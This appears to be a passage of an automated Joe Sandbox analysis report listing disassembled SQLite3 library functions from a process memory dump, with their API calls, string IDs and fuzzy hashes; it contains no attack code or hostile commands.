                                                                                                • Part of subcall function 61E0A822: sqlite3_free.SQLITE3 ref: 61E0A843
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA2E
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA10
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA54
                                                                                                • Part of subcall function 61E0A9B9: sqlite3_free.SQLITE3 ref: 61E0A9CA
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                              • String ID:
                                                                                              • API String ID: 3930042888-0
                                                                                              • Opcode ID: 29e8ae0f5494ab8a612f1f888ab6182f37c100db74b13a36ff71eb97d14f9ccf
                                                                                              • Instruction ID: 63bb81a0b3bf419812974592d8d68a6bc13e891150b75ca65fb92ffdaf69361f
                                                                                              • Opcode Fuzzy Hash: 29e8ae0f5494ab8a612f1f888ab6182f37c100db74b13a36ff71eb97d14f9ccf
                                                                                              • Instruction Fuzzy Hash: 2C018F70A40649CBCB00AFBAE8C495EF7F4EFC4309F65846ED4908B310E734D8658B51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1E181
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E1E1B1
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1E1C7
                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E1E1DF
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                              • String ID:
                                                                                              • API String ID: 3779139978-0
                                                                                              • Opcode ID: 9fd566f74b89c6b7f66afdcaae551186080e3c881e0ed872417969cce73c24b4
                                                                                              • Instruction ID: 8ce6a14b360728900a64be2fd74fc915e35977c0f6e50b979a7a8bc465938bc6
                                                                                              • Opcode Fuzzy Hash: 9fd566f74b89c6b7f66afdcaae551186080e3c881e0ed872417969cce73c24b4
                                                                                              • Instruction Fuzzy Hash: 1A0148B094CB419EE702AF65C486759BEE0BB85358F21C9AEF4884B7A5C330C580CB83
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E19464
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E1947C
                                                                                              • strcmp.MSVCRT ref: 61E19499
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E194AA
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2933023327-0
                                                                                              • Opcode ID: 672cd1814eecb2aec6213f77f78a4125dc90f82447f629333bdd84b2e913c48b
                                                                                              • Instruction ID: 3cde259a22742c9f1054c46a89e64281fb61f7826fdbc0f9e1846f8eddd38994
                                                                                              • Opcode Fuzzy Hash: 672cd1814eecb2aec6213f77f78a4125dc90f82447f629333bdd84b2e913c48b
                                                                                              • Instruction Fuzzy Hash: B3F09071A4C7A14BD710AFE984C1A1ABBA8AB8176CF29843DE9488F305D731D81087A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3C1D0
                                                                                                • Part of subcall function 61E38ACB: sqlite3_initialize.SQLITE3 ref: 61E38AD2
                                                                                                • Part of subcall function 61E38ACB: sqlite3_str_vappendf.SQLITE3 ref: 61E38B1D
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C1EE
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C1FA
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C202
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_entersqlite3_str_vappendf
                                                                                              • String ID:
                                                                                              • API String ID: 2498652501-0
                                                                                              • Opcode ID: c8f54d1cdddcc195b3f7571da4af0d171323da3f81a4d4ff0078371e724eb73f
                                                                                              • Instruction ID: b725bf90798a4a21541a7c03a88b0b7fc61bcdac9a635251504108e54da318f6
                                                                                              • Opcode Fuzzy Hash: c8f54d1cdddcc195b3f7571da4af0d171323da3f81a4d4ff0078371e724eb73f
                                                                                              • Instruction Fuzzy Hash: 71F054716043655FD7007FAD888145EBBE8EEC8654F15C92EE888C7300E770D851C792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_pointer.SQLITE3 ref: 61E3D100
                                                                                                • Part of subcall function 61E0E9A3: strcmp.MSVCRT ref: 61E0E9D2
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D119
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D12F
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D137
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_pointersqlite3_vmprintfstrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2416658597-0
                                                                                              • Opcode ID: 64fcfb30176419ab06eff722eea7ffda97e5b94d8ee14de47079f38a0e33537c
                                                                                              • Instruction ID: 772f25b4658b8814ccd55f3d593faffd6a4ef416ec447d7624ec0c0326a2e215
                                                                                              • Opcode Fuzzy Hash: 64fcfb30176419ab06eff722eea7ffda97e5b94d8ee14de47079f38a0e33537c
                                                                                              • Instruction Fuzzy Hash: B2F03AB45083519BD340AF69888125EBAE4FFC5664F64C92DE498CB380E775C8908783
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E924AE
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E924C6
                                                                                              • sqlite3_free.SQLITE3 ref: 61E924D3
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E924EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                              • String ID:
                                                                                              • API String ID: 3512769177-0
                                                                                              • Opcode ID: 8b4d9c97681afa23379cf456a1544c4d97ae7a28b77daa90330759cbc0e48b04
                                                                                              • Instruction ID: a7faf802cf544c64f8dd2bc6035d54d93d323ae008512c37d455a838e90a6769
                                                                                              • Opcode Fuzzy Hash: 8b4d9c97681afa23379cf456a1544c4d97ae7a28b77daa90330759cbc0e48b04
                                                                                              • Instruction Fuzzy Hash: D0E04FB0548B468BDB007FFA85C571D76F8BB8234DF15446CC5488B342F7B5C4A08792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strlike
                                                                                              • String ID: \$l
                                                                                              • API String ID: 933858916-789299731
                                                                                              • Opcode ID: 9a962edcbf8311a03030a1cdb42b80df691cfa5e9e9645a76dc70572ac1adefb
                                                                                              • Instruction ID: ccf0c49eb534e3c6009cbf3e0ba0a02e1b15ff3e9375ca7fdd5a26894ce87455
                                                                                              • Opcode Fuzzy Hash: 9a962edcbf8311a03030a1cdb42b80df691cfa5e9e9645a76dc70572ac1adefb
                                                                                              • Instruction Fuzzy Hash: 6712B474A042498FDB44DFA8C491BAEBBF2BF88314F248429E859EB345D779DC42CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E7F275
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E7F765
                                                                                                • Part of subcall function 61E64B10: sqlite3_strnicmp.SQLITE3 ref: 61E64B82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                              • String ID: p$a
                                                                                              • API String ID: 100587609-2774617310
                                                                                              • Opcode ID: e8d0706f19643a0c7f8fd36a22fc455bfc2c1684018ff16c6cb04a526fa07738
                                                                                              • Instruction ID: 7bfbea9d809b53a8c725440805245f1c57c2c37c067241f2b63ffe5a6789eae0
                                                                                              • Opcode Fuzzy Hash: e8d0706f19643a0c7f8fd36a22fc455bfc2c1684018ff16c6cb04a526fa07738
                                                                                              • Instruction Fuzzy Hash: 6A61E774A052598BEB20DF29C8847C9B7F0BF89308F20C4A9D859AB354D738DA95CF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_log
                                                                                              • String ID: `Aa
                                                                                              • API String ID: 632333372-4150638200
                                                                                              • Opcode ID: e800150336527023a995c349aeba7a27735e49498f2dc27530bdc5a049f79551
                                                                                              • Instruction ID: fc6d9acf59f7385389393602123b31ae3c33dcc97a3293401e3251b3429592aa
                                                                                              • Opcode Fuzzy Hash: e800150336527023a995c349aeba7a27735e49498f2dc27530bdc5a049f79551
                                                                                              • Instruction Fuzzy Hash: 8851F774A9D649DFDB00CF5CC09268A77A2FB8A350F24C82BED168B358E735D9C18B51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strnicmp
                                                                                              • String ID: '$null
                                                                                              • API String ID: 1961171630-2611297978
                                                                                              • Opcode ID: ee7419b2ed7e277ff568c0bc274485698e72dff03853abf243cb134d767bdf84
                                                                                              • Instruction ID: 64db699856c926bf6f1fed903ed9a0af56a2a1003efc68821c53fcb0a314754a
                                                                                              • Opcode Fuzzy Hash: ee7419b2ed7e277ff568c0bc274485698e72dff03853abf243cb134d767bdf84
                                                                                              • Instruction Fuzzy Hash: 6E31E820A483C68EF7008EB5C465392BBD3AB9D34BFB8C169D1454B28AE675DDE64701
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E23AA7
                                                                                                • Part of subcall function 61E18A69: InterlockedCompareExchange.KERNEL32 ref: 61E18A89
                                                                                                • Part of subcall function 61E18A69: InterlockedCompareExchange.KERNEL32 ref: 61E18AD0
                                                                                                • Part of subcall function 61E18A69: InterlockedCompareExchange.KERNEL32 ref: 61E18AF0
                                                                                                • Part of subcall function 61E189F3: sqlite3_win32_sleep.SQLITE3 ref: 61E18A4B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E23B72
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                              • String ID: winDelete
                                                                                              • API String ID: 3336177498-3936022152
                                                                                              • Opcode ID: ab892e8228a5b3e34b700c1a8b1b353e00f59013b3ea2d984c3764a9a89f54d5
                                                                                              • Instruction ID: d0522adf12587d15279c09fa83411bc3e7b5bea1f215481e344140adb29f2a35
                                                                                              • Opcode Fuzzy Hash: ab892e8228a5b3e34b700c1a8b1b353e00f59013b3ea2d984c3764a9a89f54d5
                                                                                              • Instruction Fuzzy Hash: FE3198B0E1875A8BEB01DFA5C89559EBBB5FF8D318F30C529E85296340D734C9428F52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 3
                                                                                              • API String ID: 0-1842515611
                                                                                              • Opcode ID: 0978d28bd642f22827974ce885a96dc1c4f4af1e7d2f7c2c8cdcf6307ea1d685
                                                                                              • Instruction ID: 4e5c2a4fe554e193ea55f299baa8a105126296aa7bb747c3c5bd094e21da8ecb
                                                                                              • Opcode Fuzzy Hash: 0978d28bd642f22827974ce885a96dc1c4f4af1e7d2f7c2c8cdcf6307ea1d685
                                                                                              • Instruction Fuzzy Hash: 86317A749442648BDB21CF69C8C07C9BBF4FB06718F6485A9E89C9B345D770E984CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQuery
                                                                                              • String ID: @
                                                                                              • API String ID: 1027372294-2766056989
                                                                                              • Opcode ID: 1ae9009f3a3168a4bf2392de961bcbf4039699a472af85b23aad72ecee92efe2
                                                                                              • Instruction ID: 4142cea1e346a0175b9ecf8fb6ac01727a9c4b95edeb9471b10218aae38749d4
                                                                                              • Opcode Fuzzy Hash: 1ae9009f3a3168a4bf2392de961bcbf4039699a472af85b23aad72ecee92efe2
                                                                                              • Instruction Fuzzy Hash: E83168B2914B028FE710DFB9C58460AFBE0FF45354F64CA28E89897350E734E880CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_exec
                                                                                              • String ID: -a$sqlite_stat1
                                                                                              • API String ID: 2141490097-3864893345
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E14295
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1430A
                                                                                                • Part of subcall function 61E13FAA: sqlite3_mutex_try.SQLITE3(?,?,?,61E1402A), ref: 61E13F4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
                                                                                              • String ID: #
                                                                                              • API String ID: 2389339727-1885708031
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_stricmp.SQLITE3(00000000,?,?,61E6422A), ref: 61E03CB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmp
                                                                                              • String ID: sqlite_master$sqlite_temp_master
                                                                                              • API String ID: 912767213-3047539776
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D9D5
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                              • String ID:
                                                                                              • API String ID: 3265351223-3916222277
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D963
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D96F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                              • String ID:
                                                                                              • API String ID: 3265351223-3916222277
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E103B5), ref: 61E1035E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter
                                                                                              • String ID: @Da$@Da
                                                                                              • API String ID: 3053899952-1574951822
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E38AD2
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_str_vappendf.SQLITE3 ref: 61E38B1D
                                                                                                • Part of subcall function 61E215AC: sqlite3_str_append.SQLITE3 ref: 61E21628
                                                                                                • Part of subcall function 61E215AC: sqlite3_str_append.SQLITE3 ref: 61E2165C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append$sqlite3_configsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_str_vappendf
                                                                                              • String ID: F
                                                                                              • API String ID: 4014417345-1304234792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%